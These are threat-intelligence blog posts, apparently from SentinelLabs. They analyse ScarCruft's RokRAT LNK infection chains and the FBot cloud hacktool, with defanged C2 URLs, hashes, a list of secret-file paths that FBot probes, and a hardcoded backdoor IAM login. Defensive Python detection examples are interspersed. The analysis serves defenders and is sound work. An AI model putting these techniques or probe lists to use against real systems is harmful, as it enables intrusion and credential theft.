6. 이종겸 북한인권 토론회 토론문.hwp | 6. Lee Jong-gyeom North Korean human rights debate discussion paper.hwp
7. 박유성 북한주민 정보접근 강화방안.hwp | 7. Park Yoo-sung’s plan to strengthen North Korean residents’ access to information.hwp
8. 이도건 북한연구소 토론회.lnk | 8. Lee Do-gun North Korean Research Center Discussion.lnk
9. 김태원 북한인권 전문가 토론회 토론문.hwp | 9. Taewon Kim, North Korean human rights expert discussion paper.hwp
10. 서유석 북한 주민들의 알권리 제고 방안.hwp | 10. Seo Yoo-seok’s plan to improve North Korean residents’ right to know.hwp

The LNK files exceed 48 MB and implement a multi-stage mechanism deploying the RokRAT backdoor.

Infection chain: 8. 이도건 북한연구소 토론회.lnk

The LNK files execute PowerShell code that performs the following actions:

  • Locates the executing LNK file based on its file size.
  • Extracts from the LNK file a decoy document (in HWP and HWPX format), a Windows Batch script named 111223.bat, and a PowerShell script named public.dat, placing the script in the %Public% folder.
  • Displays the decoy document and executes 111223.bat.
  • Deletes the executing Shortcut file.

The PowerShell code locates the content of the files it extracts from the LNK file based on hardcoded offsets.

PowerShell code

111223.bat then executes the PowerShell script stored in %Public%\public.dat. This script decodes and executes another hex-encoded PowerShell script embedded in public.dat.

The content of public.dat

The decoded script downloads from a major Cloud file hosting provider a file named myprofile[.]zip, XOR-decrypts the file using the first byte as an XOR key, and executes the decrypted content in a thread.

myprofile[.]zip implements a shellcode that deploys the RokRAT backdoor. RokRAT uses public Cloud services for command-and-control purposes, such as pCloud and Yandex Cloud, disguising malicious communication as legitimate network traffic.

ScarCruft PowerShell script executing shellcode

While most of the documents we analyzed are stripped of metadata, a HWPX decoy document stands out by containing metadata that identifies the pseudonym bandi as the document’s creator. We note the use of the same string in the context of Kimsuky activities, for example, in an email address used in a phishing campaign (bandi00413[@]daum.net) and in a C2 server domain (one.bandi[.]tokyo).

While the overlap in pseudonym use does not represent a strong link between the groups from a technical perspective, it is still indicative of the suspected relations between them. In the context of North Korea, the term bandi is known as the pseudonym of a suspected North Korean author known for publishing dissident writing. bandi also means ‘firefly’ in Korean.

The bandi pseudonym (HWPX document metadata)

Earlier Overlapping Campaign

Some of the individuals targeted in the December 2023 ScarCruft activity, discussed above, were also targeted approximately one month earlier on November 16, 2023. This speaks of the adversary’s persistence and adaptability in pursuing its goals. The November campaign included individuals from a news organization focused on North Korea as well.

A phishing email, impersonating a member of the North Korea Research Institute, was sent from the address c039911[@]daum.net. The email attaches two malicious HWP files, titled 조선 시장 물가 분석(회령).hwp (Shipbuilding market price analysis (Hoeryeong).hwp) and 조선 시장 물가 분석(신의주).hwp (Shipbuilding market price analysis (Sinuiju).hwp, machine translation from Korean), disguised as North Korean market price analysis data.

Phishing email (in Korean)

The documents contain OLE objects, activated by double-clicking on the document’s content. In adherence to the HWP document format, the OLE objects are stored as compressed Structured Storage objects, and their decompression reveals C2 URLs accessed upon OLE object activation.

The HWP documents contain metadata, including the LinkValue, Last Saved By, and Author metadata values, which provide information on the system accounts where the documents have been created.

HWP document: C2 URL and metadata
조선 시장 물가 분석(회령).hwp
  C2 URL: http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=5JV0FAGA6KW1GBHB7LX2HCIC
  LinkValue: \Users\Moo\AppData\Local\Temp
  Last Saved By: Moo
  Author: Moo
조선 시장 물가 분석(신의주).hwp
  C2 URL: http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=GV6BQLRKHW7CRMSLIX8DSNTM
  LinkValue: \Users\DailyN~1\AppData\Local\Temp
  Last Saved By: dailynk_001
  Author: dailynk01

The DailyN~1/dailynk_001/dailynk01 account is particularly interesting since it relates to Daily NK, a prominent South Korean online news outlet that provides independent reporting on North Korea with which we have collaborated in the past. The focus of this organization makes it an attractive target for North Korean threat actors seeking to intrude into or impersonate it, a strategy previously observed by SentinelLabs in past Kimsuky campaigns. It remains to be investigated whether this account is used for developing malware involved in Daily NK-related campaigns and/or serves as an additional indicator of the suspected relations between Kimsuky and ScarCruft. Additionally, in our previous reporting on the overlap of suspected North Korean intrusions into a Russian missile engineering organization, we shared links to ScarCruft infrastructure making use of this same illicit naming scheme, such as dallynk[.]com.

Pivoting on the DailyN~1 artifact revealed additional HWP documents that share overlapping metadata information and employ the same OLE-based infection vector, using different C2 URLs.

HWP document (SHA-1 hash): C2 URL and metadata
e9df1f28cfbc831b89a404816a0242ead5bb142c
  C2 URL: http[://]nav[.]offlinedocument[.]site/capture/parts/you?view=IV3D9YMNJW4EAZNOKX5FB0OP
  LinkValue: \Users\DailyN~1\AppData\Local\Temp
  Last Saved By: dailynk01
  Author: umgdnk-03
2f78abc001534e28eb208a73245ce5389c40ddbe
  C2 URL: http[://]app[.]documentoffice[.]club/voltage_group_intels?user=HE16AJHVFCZ48HFTGD059IGU
  LinkValue: \Users\DailyN~1\AppData\Local\Temp
  Last Saved By: dailynk_001
  Author: /

The app.documentoffice[.]club domain is also used as a C2 endpoint for malicious Microsoft Office documents, which employ ActiveX controls to establish communication with the C2 server.

Office document (SHA-1 hash): C2 URL
e46907cfaf96d2fde8da8a0281e4e16958a968ed
  C2 URL: http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=8B86CA616964A84Y7A75B950
39c97ca820f31e7903ccb190fee02035ffdb37b9
  C2 URL: http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=H11I75PFF0ZG53NDG00H64OE
577c3a0ac66ff71d9541d983e37530500cb9f2a5
  C2 URL: http[://]app[.]documentoffice[.]club/salt_view_doc_words?user=MZ9IUNQ7KX7GSLO5LY8HTMP6

At the time of analysis, the C2 URLs were inactive, preventing us from examining their functions and any potential additional payloads they might deliver to the targets. We are still investigating the role of the user and view query parameter values, such as 5JV0FAGA6KW1GBHB7LX2HCIC and H11I75PFF0ZG53NDG00H64OE.

While preparing this report, Genians released research that outlines ScarCruft campaigns throughout 2023, covering certain aspects of the activities discussed in this section. We add to the public information on this activity cluster by providing additional details on the related infrastructure.

Infrastructure associated with this cluster of suspected North Korean threat activity leads to multiple interesting details which we have found useful for further monitoring and analysis of separate campaigns. The domains offlinedocument[.]site and documentoffice[.]club both make use of a variety of subdomains such as open, nav, and app as previously mentioned. During their illicit use, the domains temporarily make use of Lithuania’s Cherry Servers virtual private server (VPS) hosting service – 84.32.131[.]87, and 84.32.131[.]104 in this case.

A repeating trend is the actor registering domains through Namecheap, leaving the domain parked on a Namecheap IP address, and then rotating to Cherry Servers. In separate domains, we observe this same operational workflow, and interestingly other domains which the actor only makes use of for one or two days before shifting back to a parked IP address. We assess this process aims to limit detection and analysis capabilities following their malicious activity, such as hosting a phishing login or malware delivery link.

Examples of this activity can be found through publicly available telemetry, such as that of instantreceive[.]org. This domain hosted a page mimicking GitHub, a characteristic not new to North Korea-attributed threat actors, as we have reported on in the past.

GitHub phishing page

This domain overlaps through the use of unique Cherry Servers hosting IPs, which can be used for further moderate-confidence infrastructure pivoting. We encourage readers to conduct additional research and monitoring. The full list shown here is provided in the IOC table.

ScarCruft Cherry Servers overlap map

ScarCruft Testing Grounds

While investigating ScarCruft activities, we retrieved malware that we assess to be part of ScarCruft’s planning and testing processes. This includes a spectrum of shellcode variants delivering RokRAT, public tooling, and two oversized LNK files, named inteligence.lnk and news.lnk.

Although similar to those implemented by 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk and 8. 이도건 북한연구소 토론회.lnk discussed above, the infection chains executed by inteligence.lnk and news.lnk exhibit some differences. This has likely been done to evade detection based on the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community.

Infection chain: news.lnk

inteligence.lnk executes PowerShell code, which locates the executing LNK file based on its filename instead of its filesize. The code then extracts from the LNK file and displays a decoy PDF document (named inteligence.pdf), and downloads from a major Cloud file hosting provider a hex-encoded file named story.txt. The PowerShell code locates the content of the decoy document it extracts from the LNK file based on a byte pattern (50 4b 03 04) instead of a hardcoded file offset.

The PowerShell code then decodes the file, and executes the decoded file content in a thread. story.txt implements a benign shellcode that just opens notepad.exe, indicating that inteligence.lnk has been developed for testing purposes.

In contrast to 3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk and 8. 이도건 북한연구소 토론회.lnk, inteligence.lnk does not execute a Windows Batch script or an external PowerShell script.

inteligence.lnk: Extraction and display of a decoy document
inteligence.lnk: Shellcode decoding and execution
inteligence.lnk: Shellcode
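The carving step these loaders perform (hardcoded offsets in the December samples, a search for the byte pattern 50 4B 03 04 in inteligence.lnk) can be turned around for triage. The following Python is an added example, not code from the samples or from SentinelLabs: it validates the Shortcut header, flags oversized LNK files, and reports the offsets of embedded ZIP/OLE/PDF signatures; the 1 MB threshold is an assumption, and the input is a constructed stand-in file rather than real sample bytes.

```python
"""Triage helper for oversized Windows Shortcut (.lnk) files.

The ScarCruft shortcuts described above are tens of megabytes because they carry
a decoy document, a batch script and a PowerShell script that the embedded
command extracts at hardcoded offsets (or, in the test build, by searching for
the ZIP signature 50 4B 03 04). Added example for this write-up; not code from
the samples or from SentinelLabs.
"""
import struct

LNK_HEADER_SIZE = 0x4C
# ShellLink CLSID 00021401-0000-0000-C000-000000000046 as stored in the header.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Signatures of the embedded payload types mentioned in the write-up:
# HWPX/PPTX are ZIP containers, HWP is an OLE compound file, PDF is the test decoy.
SIGNATURES = {
    b"PK\x03\x04": "zip (HWPX/PPTX/ZIP)",
    b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1": "ole (HWP/DOC)",
    b"%PDF": "pdf",
}
SIZE_THRESHOLD = 1 * 1024 * 1024  # assumption: a normal shortcut is a few hundred bytes


def is_lnk(data: bytes) -> bool:
    """True if the file starts with a well-formed ShellLink header."""
    if len(data) < LNK_HEADER_SIZE:
        return False
    header_size = struct.unpack_from("<I", data, 0)[0]
    return header_size == LNK_HEADER_SIZE and data[4:20] == LNK_CLSID


def carve_signatures(data: bytes, start: int = LNK_HEADER_SIZE) -> list:
    """Return sorted [(offset, kind)] for every known signature after the header."""
    hits = []
    for sig, kind in SIGNATURES.items():
        pos = data.find(sig, start)
        while pos != -1:
            hits.append((pos, kind))
            pos = data.find(sig, pos + 1)
    return sorted(hits)


def triage(data: bytes) -> dict:
    """Summarize why a shortcut looks like a payload carrier."""
    lnk = is_lnk(data)
    report = {
        "is_lnk": lnk,
        "size": len(data),
        "oversized": len(data) > SIZE_THRESHOLD,
        "embedded": carve_signatures(data) if lnk else [],
        "powershell_ref": b"powershell" in data.lower(),
    }
    report["suspicious"] = lnk and (report["oversized"] or bool(report["embedded"]))
    return report


def build_sample(oversized: bool = True) -> bytes:
    """Constructed stand-in, not real sample bytes: a valid header, a PowerShell
    reference where the argument string would be, 2 MiB of padding, then a ZIP
    signature where a HWPX decoy would sit. oversized=False yields the shape of
    an ordinary shortcut for comparison."""
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID).ljust(LNK_HEADER_SIZE, b"\x00")
    if not oversized:
        return header + b"\x00" * 20
    body = b"powershell".ljust(0x200, b"\x00")
    payload_area = b"\x00" * (2 * 1024 * 1024) + b"PK\x03\x04" + b"\x00" * 64
    return header + body + payload_area


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(triage(data))
```

Run it against a quarantined .lnk path to get the report; the carved offsets are what you would pass to dd or a hex editor to pull out the embedded files for analysis.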

news.lnk downloads, in the form of a file named story3.txt, and executes PowerShell code. The implementation and functionality of the code are very similar to that executed by inteligence.lnk, with a major difference being that the shellcode it executes is not downloaded from a remote endpoint but is embedded in the LNK file itself.

In contrast to inteligence.lnk, the shellcode executed by news.lnk is weaponized and deploys the RokRAT backdoor. It is likely that news.lnk is the fully developed version of inteligence.lnk, intended for use in future ScarCruft campaigns. As of the time of writing, we have not observed news.lnk or its variants in the wild.

Both LNK files deploy the same decoy document – a public research report on the Kimsuky threat group by Genians, a South Korean cybersecurity company. The report is written in Korean and was released in late October 2023.

ScarCruft Decoy document

Given the report’s technical content, the LNK file names, and ScarCruft’s use of decoys relevant to the targeted individuals, we suspect ScarCruft has been planning phishing or social engineering campaigns on recent developments in the North Korean cyber threat landscape, targeting audiences consuming threat intelligence reports.

Conclusions

The findings outlined in this post highlight ScarCruft’s ongoing dedication to gathering strategic intelligence through targeted attacks. Our insight into ScarCruft’s malware testing activities reveals the adversary’s commitment to innovating its arsenal and expanding its target list, likely intending to target and/or masquerade as cybersecurity professionals or businesses.

We observed the group experimenting with new infection chains inspired by those they have used in the past. This involves modifying malicious code implementations and excluding certain files from the infection steps, likely as a strategy to evade detection based on filesystem artifacts and the known ScarCruft techniques that have been publicly disclosed by the threat intelligence community.

We suspect that ScarCruft is pursuing non-public cyber threat intelligence and defense strategies. This could benefit not only ScarCruft specifically but also the other constituent groups within the North Korean threat landscape, aiding them in identifying threats to their operations and improving their operational playbooks.

A heightened awareness and better understanding of the adversary’s attack and infection methods among potential targets are crucial for effective defense. SentinelLabs remains actively engaged in tracking ScarCruft activities and supporting the organizations and individuals at risk of being targeted.

Indicators of Compromise


LABScon Replay | Send Lawyers, ‘Garchs, and Money

By: LABScon
18 January 2024 at 16:43

Allegations of oligarch election meddling and influence are old news in 2024, but while prosecutors focus on the money trail in building threat intelligence based cases for indictment, don’t overlook oligarch-funded lawyers with creative delay and distract defense tactics.

From twisting data privacy laws to using funds for SLAPP (Strategic Lawsuits Against Public Participation) libel cases to leaking legal discovery, Elizabeth Wharton dissects a series of US and UK cases citing the Mueller report and the Steele (Orbis) Dossier as examples where oligarchs have thrown lawyers and money as curveballs to exert influence and thwart cybercrime prosecutions. Liz explores the chilling effects that strategic lawsuits can have on researchers when their findings are buried or discredited in lengthy and expensive legal process.

Liz also discusses ways to further leverage these cases as opportunities for closing policy gaps, extend anti-SLAPP legislation and improve open source intelligence data gathering.


About the Presenter

Elizabeth (Liz) leverages almost two decades of legal, public policy, and business experience to advise researchers and to build and scale cybersecurity and threat intelligence focused companies. In addition to having led operations at two adversary research focused startups, her recent prior experience includes serving as the Senior Assistant City Attorney on Atlanta’s ransomware incident immediate response team. Liz was recognized as the 2022 “Cybersecurity or Privacy Woman Law Professional of the Year” by the United Cybersecurity Alliance.

About LABScon 2023

This presentation was featured live at LABScon 2023, an immersive 3-day conference bringing together the world’s top cybersecurity minds, hosted by SentinelOne’s research arm, SentinelLabs.

Exploring FBot  | Python-Based Malware Targeting Cloud and Payment Services

11 January 2024 at 13:55

Executive Summary

  • FBot is a Python-based hacking tool distinct from other cloud malware families, targeting web servers, cloud services, and SaaS platforms like AWS, Office365, PayPal, Sendgrid, and Twilio.
  • FBot does not utilize the widely-used Androxgh0st code but shares similarities with the Legion cloud infostealer in functionality and design.
  • Key features include credential harvesting for spamming attacks, AWS account hijacking tools, and functions to enable attacks against PayPal and various SaaS accounts.
  • FBot is characterized by a smaller footprint compared to similar tools, indicating possible private development and a more targeted distribution approach.

Overview

The cloud hacktool scene is highly intertwined, with many tools relying on one another’s code. This is particularly true for malware families like AlienFox, Greenbot, Legion, and Predator, which share code from a credential scraping module called Androxgh0st.

We identified a tool that is related but distinct from these families. FBot is a Python-based attack tool with features to target web servers and cloud services as well as Software-as-a-Service (SaaS) technologies, including:

  • Amazon Web Services (AWS)
  • Office365
  • PayPal
  • Sendgrid
  • Twilio

FBot is unique in that it does not apparently adapt the Androxgh0st code so common among similar hacktools, though the earliest reference to FBot is one year more recent than the first sighting of Androxgh0st. However, there are several connections to the Legion cloud infostealer, making it likely the Legion maintainer adapted code from FBot into their tool.

FBot is primarily designed for actors to hijack cloud, SaaS, and web services. There is a secondary focus on obtaining accounts to conduct spamming attacks. Actors can use the credential harvesting features to obtain initial access, which they can sell to other parties.

The tool contains assorted utilities, including an IP address generator and port scanner. There is also an email validator function, which uses an Indonesian technology service provider to validate email addresses.

FBot menu and list of features
FBot menu and list of features

AWS Targeting

FBot has three functions dedicated to AWS account attacks. The first is an AWS API Key Generator, handled by function aws_generator, which generates a random AWS access key ID by appending 16 randomly selected alphabetic characters to the standard AKIA prefix. Then, it generates a secret key from 40 randomly selected alphabetic characters.

Despite FBot’s apparent lack of adopting the Androxgh0st modules, the same feature was highlighted in research on the Legion stealer as well as an older Androxgh0st variant, and it has not changed significantly. We agree with the aforementioned researchers’ conclusion that this feature is unlikely to succeed at brute forcing account credentials due to the possible number of access key and password combinations.

The second AWS feature is a Mass AWS Checker, handled by function aws_checker. This function checks for AWS Simple Email Service (SES) email configuration details, including the maximum send quota and rate, as well as how many messages have been sent in the past 24 hours, likely to maximize spamming efforts against the targeted account. It also creates a new user account with the username iDevXploit and the password MCDonald2021D#1337 and attaches the AdministratorAccess policy to elevate privileges for the new account. Unlike other cloud attack tools such as AlienFox, FBot does not delete the compromised account that the attacker used to gain access.

The third and final AWS feature is an AWS EC2 Checker, with the description Get EC2 VCPU Limit, which is handled by function ec_checker. This function reads a list of AWS identities from a text file in the format of AccessKey|SecretKey|Region. The script uses these values to check the targeted account’s EC2 service quotas. The FBot menu highlights that this can be used to check vCPU details, although the output is less straightforward. The query results describe the account’s EC2 configurations and capabilities, such as what types of EC2 instances can run. The script iterates through a list of specified AWS regions, runs the query again for each region, and logs the result to a text file.

Example EC2 quota output captured by FBot’s ec_checker function
Example EC2 quota output captured by FBot’s ec_checker function

SaaS & Payment Services Targeting

FBot has several features that target payment services as well as SaaS configurations.

The PayPal Validator feature is handled by paypal_validator. This function validates PayPal account status by contacting a hardcoded URL with an email address read from an input list. The email is added to the request in the customer details section to validate whether an email address is associated with a PayPal account.

The script initiates the Paypal API request via the website hxxps://www.robertkalinkin.com/index.php, which is a Lithuanian fashion designer’s retail sales website. Interestingly, all identified FBot samples use this website to authenticate the PayPal API requests, and several Legion Stealer samples do as well.

PayPal Validator crafts the request to this site with a fake item ID as well as phony customer details, then parses the response for a status message indicating success.

PayPal validation request data
PayPal validation request data

FBot also targets several SaaS platforms, including Sendgrid and Twilio. The Sendgrid feature is a Sendgrid API Key Generator, which generates a Sendgrid key formatted like:

SG.{22 characters from [A-Z0-9-_]}.{1 more character from previous range}

The Twilio feature takes the Twilio SID and Twilio Auth Token as input, separated by a pipe. The function then checks the SID and auth token combination for details about the account, including the balance and its currency, and a list of phone numbers connected to the account.

Web Framework Features

FBot has features for validating if URLs host a Laravel environment file and for extracting credentials from those files. The Hidden Config Scanner feature takes a URL as input and crafts an HTTP GET request to several PHP, Laravel, and AWS-related URIs where configuration values may be stored, including:

  • _profiler/phpinfo
  • .env
  • .env.bak
  • aws.yml
  • aws/credentials
  • config.js
  • config/aws.yml
  • info.php
  • phpinfo
  • phpinfo.php

The response is parsed for keys and secrets related to the following services and the result is written to a text file:

  • AWS
  • Coinpayments
  • DB_USERNAME (generic database)
  • Ionos
  • MAIL_PASSWORD (generic SMTP)
  • Mailgun
  • MandrillApp
  • Office365
  • Plivo
  • Sendgrid
  • Twilio
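Because the Hidden Config Scanner walks a fixed list of paths, its activity is easy to pick out of web server access logs, and the response code tells you whether a probe merely failed or actually found an exposed secrets file. The following Python is an added example, not FBot or SentinelLabs code; it assumes Common Log Format lines, uses constructed sample entries, and the three-distinct-paths threshold is an assumption.

```python
"""Spot the config-file probing of FBot's Hidden Config Scanner in access logs
and separate scanning attempts from actual exposure (HTTP 200 on a probe).
Added example for this write-up; not code from FBot or SentinelLabs.
"""
import re
from collections import defaultdict

# Paths the Hidden Config Scanner requests, as listed above.
PROBED_PATHS = {
    "_profiler/phpinfo", ".env", ".env.bak", "aws.yml", "aws/credentials",
    "config.js", "config/aws.yml", "info.php", "phpinfo", "phpinfo.php",
}

# Common Log Format: client ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line: str):
    """Parse one CLF line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def probed_name(path: str):
    """Map a request path (query string stripped) to the probe it matches.
    The tool requests these at the web root, so only root paths are matched."""
    name = path.split("?", 1)[0].lstrip("/")
    return name if name in PROBED_PATHS else None


def analyze(lines, min_distinct: int = 3):
    """Return (scanners, exposures).

    scanners:  {ip: [probe, ...]} for clients that requested at least
               `min_distinct` different probe paths (the tool walks the list).
    exposures: [(ip, path, status)] where a probe was answered with HTTP 200,
               meaning a secrets file or phpinfo page is actually reachable.
    """
    seen = defaultdict(set)
    exposures = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        probe = probed_name(rec["path"])
        if probe is None:
            continue
        seen[rec["ip"]].add(probe)
        if rec["status"] == 200:
            exposures.append((rec["ip"], rec["path"], rec["status"]))
    scanners = {ip: sorted(p) for ip, p in seen.items() if len(p) >= min_distinct}
    return scanners, exposures


# Constructed access-log lines (not real traffic); IPs are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Jan/2024:13:55:01 +0000] "GET /.env HTTP/1.1" 404 196
203.0.113.10 - - [11/Jan/2024:13:55:01 +0000] "GET /.env.bak HTTP/1.1" 404 196
203.0.113.10 - - [11/Jan/2024:13:55:02 +0000] "GET /aws/credentials HTTP/1.1" 404 196
203.0.113.10 - - [11/Jan/2024:13:55:02 +0000] "GET /phpinfo.php HTTP/1.1" 200 48213
203.0.113.10 - - [11/Jan/2024:13:55:03 +0000] "GET /_profiler/phpinfo HTTP/1.1" 404 196
198.51.100.7 - - [11/Jan/2024:14:02:10 +0000] "GET /index.php HTTP/1.1" 200 5120
198.51.100.7 - - [11/Jan/2024:14:02:11 +0000] "GET /info.php HTTP/1.1" 404 196
""".splitlines()

if __name__ == "__main__":
    scanners, exposures = analyze(SAMPLE_LOG)
    print("scanning clients:", scanners)
    print("exposed paths:", exposures)
```

An entry in exposures is the urgent case: the file answered, so rotate whatever credentials it held and remove it from the web root, regardless of who requested it.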

FBot also targets several popular Content Management Systems (CMS). The function cms_scanner contains a map of CMS and web frameworks to regular expressions (regex) associated with the service. The program creates a request to the targeted URL and parses the response for the following technologies:

  • Codeigniter
  • Discuz
  • Drupal
  • Esportsify
  • FluxBB
  • Invision
  • Jive
  • Joomla
  • Laravel
  • Lithium
  • Magento
  • MediaWiki
  • Moodle
  • Ning
  • OpenCart
  • osCommerce
  • phpBB
  • PrestaShop
  • vBulletin
  • Whmcs
  • WordPress
  • YetAnotherForum
  • ZenCart
  • Zimbra

Taxonomy

FBot relies on configuration values to be fed to it through a configuration file (.ini), or through headers that initiate the main class. We identified one version that is compiled as a Windows executable.

The string iDevXploit is present across all samples: this handle is credited as the author in the main class. Additionally, the aws_checker function leaves artifacts in targeted AWS consoles: when FBot creates a new user in the AWS account, the username iDevXploit is consistent across samples, along with the password MCDonald2021D#1337.

Unlike many similar cloud hacktools, FBot does not contain references to the open-source Androxgh0st code found in tools like AlienFox, GreenBot, and Predator. The logic implemented is very similar in that both Androxgh0st and FBot parse environment configuration files for credentials related to similar mail & cloud services, but the implementation is different and no code seems to be directly borrowed.

There is considerable overlap with the Legion cloud infostealer in how the tools scrape URLs for PHP configuration. However, FBot is much smaller and less fully featured than Legion, with FBot samples weighing in at approximately 200 KB and Legion ranging from 800-1200 KB in size.

Conclusion

FBot demonstrates another tool family that continues the trend of adopting cloud attack tool code from one tool into another, while maintaining its own distinct flavor. We have seen samples spanning July 2022 to January 2024, showing there is continued proliferation of this tool. However, there are relatively few changes across versions and it is unclear whether this is actively maintained.

As of this writing, we are unable to identify a distribution channel dedicated to FBot, which differentiates the tool from other cloud infostealers often sold on Telegram. The bot has references to buffer_0x0verfl0w, a Telegram channel associated with various crimeware that has since been retired. However, we found indications that FBot is the product of private development work, so contemporary builds may be distributed through a smaller scale operation. This aligns with the theme of cloud attack tools being bespoke ‘private bots’ tailored for the individual buyer, which is a theme prevalent among AlienFox builds.

Organizations should enable multi-factor authentication (MFA) for AWS services with programmatic access. Create alerts that notify security operations teams when a new AWS user account is added to the organization, as well as alerts for new identities added or major configuration changes to SaaS bulk mailing applications where possible.
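The alerting recommended here can be expressed directly over CloudTrail: the aws_checker behaviour described in the AWS Targeting section (CreateUser followed within seconds by AttachUserPolicy granting AdministratorAccess) is a sequence worth flagging on its own, independent of the iDevXploit username. The following Python is an added example, not FBot or SentinelLabs code; the records are constructed, the access key IDs are placeholders, and the five-minute window is an assumption.

```python
"""Flag the IAM persistence sequence FBot's aws_checker leaves in CloudTrail:
CreateUser followed shortly by AttachUserPolicy granting AdministratorAccess.
Added example for this write-up; not code from FBot or SentinelLabs.
"""
import json
from datetime import datetime, timedelta

ADMIN_POLICY_ARN = "arn:aws:iam::aws:policy/AdministratorAccess"
# IAM username hardcoded across the FBot samples described above.
KNOWN_FBOT_USERNAMES = {"iDevXploit"}


def parse_cloudtrail(raw: str) -> list:
    """Parse a CloudTrail log file: a JSON object holding a 'Records' list."""
    return json.loads(raw)["Records"]


def _event_time(record: dict) -> datetime:
    return datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def detect_iam_persistence(records: list, window: timedelta = timedelta(minutes=5)) -> list:
    """Return one finding per user that was created and then granted
    AdministratorAccess within `window`. Matching on the sequence rather than
    the username also catches builds that change the hardcoded user."""
    created = {}  # userName -> (creation time, creator's access key id)
    findings = []
    for rec in sorted(records, key=_event_time):
        if rec.get("eventSource") != "iam.amazonaws.com":
            continue  # SES quota checks and the like are not IAM changes
        params = rec.get("requestParameters") or {}
        user = params.get("userName")
        caller = rec.get("userIdentity", {}).get("accessKeyId")
        if rec["eventName"] == "CreateUser" and user:
            created[user] = (_event_time(rec), caller)
        elif (rec["eventName"] == "AttachUserPolicy"
              and params.get("policyArn") == ADMIN_POLICY_ARN
              and user in created):
            created_at, creator = created[user]
            delay = _event_time(rec) - created_at
            if delay <= window:
                findings.append({
                    "user": user,
                    "created_by": creator,
                    "seconds_to_admin": int(delay.total_seconds()),
                    "source_ip": rec.get("sourceIPAddress"),
                    "known_fbot_username": user in KNOWN_FBOT_USERNAMES,
                })
    return findings


# Constructed CloudTrail records (not real telemetry); key IDs are placeholders.
_ATTACKER = {"accessKeyId": "AKIAPLACEHOLDER00001"}
_ADMIN = {"accessKeyId": "AKIAPLACEHOLDER00002"}
SAMPLE_CLOUDTRAIL = json.dumps({"Records": [
    {"eventTime": "2024-01-11T13:55:00Z", "eventSource": "ses.amazonaws.com",
     "eventName": "GetSendQuota", "sourceIPAddress": "203.0.113.10",
     "userIdentity": _ATTACKER},
    {"eventTime": "2024-01-11T13:55:03Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateUser", "sourceIPAddress": "203.0.113.10",
     "userIdentity": _ATTACKER, "requestParameters": {"userName": "iDevXploit"}},
    {"eventTime": "2024-01-11T13:55:04Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateLoginProfile", "sourceIPAddress": "203.0.113.10",
     "userIdentity": _ATTACKER,
     "requestParameters": {"userName": "iDevXploit", "passwordResetRequired": False}},
    {"eventTime": "2024-01-11T13:55:05Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachUserPolicy", "sourceIPAddress": "203.0.113.10",
     "userIdentity": _ATTACKER,
     "requestParameters": {"userName": "iDevXploit", "policyArn": ADMIN_POLICY_ARN}},
    # Routine onboarding by an administrator: new user, narrow policy, no finding.
    {"eventTime": "2024-01-11T15:10:00Z", "eventSource": "iam.amazonaws.com",
     "eventName": "CreateUser", "sourceIPAddress": "198.51.100.7",
     "userIdentity": _ADMIN, "requestParameters": {"userName": "deploy-bot"}},
    {"eventTime": "2024-01-11T15:10:30Z", "eventSource": "iam.amazonaws.com",
     "eventName": "AttachUserPolicy", "sourceIPAddress": "198.51.100.7",
     "userIdentity": _ADMIN,
     "requestParameters": {"userName": "deploy-bot",
                           "policyArn": "arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess"}},
]})

if __name__ == "__main__":
    for finding in detect_iam_persistence(parse_cloudtrail(SAMPLE_CLOUDTRAIL)):
        print(finding)
```

The created_by key ID in a finding is the credential the tool was run with, which is the one to disable first; the new user is only the persistence it left behind.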

Indicators of Compromise

SHA1 Notes
1ad78e99918fd66ed43d42a93d2f910a2173b3c5 Bot.py, January 2024 version of FBot
2becd32162b2b0cb1afc541e33ace3a29dad96f1 April 2023 version of FBot
8ba3fca4deada6dbdc94b17a0c3c55a0b785331e Bot.py, July 2022 version of FBot
iDevXploit Hardcoded AWS IAM Username
MCDonald2021D#1337 Hardcoded AWS IAM User password

LABScon Replay | Spectre Strikes Again: Introducing the Firmware Edition

By: LABScon
28 December 2023 at 16:00

The excitement surrounding speculative execution attacks may have subsided, but sadly, such threats remain. Binarly Research has discovered a vast attack surface still vulnerable to known issues like Spectre v1 and v2 on AMD silicon. Ineffective mitigations and the complexity of validation negatively impact the AMD device ecosystem.

While the industry is currently concentrating on constructing confidential computing infrastructure, foundational design problems reveal a lack of basic security at the hardware level. This discovery was made possible due to the asynchronous nature of firmware and hardware security fixes development.

Throughout their lifecycle, devices are susceptible to security issues due to the asynchronous nature of firmware security fixes delivery from multiple parties and the asynchronous nature of the supply chain. The lack of transparency in vendor security advisories results in an opaque channel for informing customers about the criticality of released security fixes and leads to varying approaches to patching widespread vulnerabilities with industry-wide implications.

Even major silicon vendors develop mitigations for side-channel attacks differently. This situation presents an opportunity for potential threat actors to exploit known speculative attacks like the 5-year-old Spectre or the 1-year-old Retbleed. A new perspective is needed to construct an attack vector that utilizes speculative attacks to target UEFI-specific firmware vulnerabilities.

In this presentation, we discuss our research into the potential use of speculative attacks against the System Management Mode (SMM) on AMD-based devices and outline the methodologies we employed throughout our research investigation.

About the Presenter

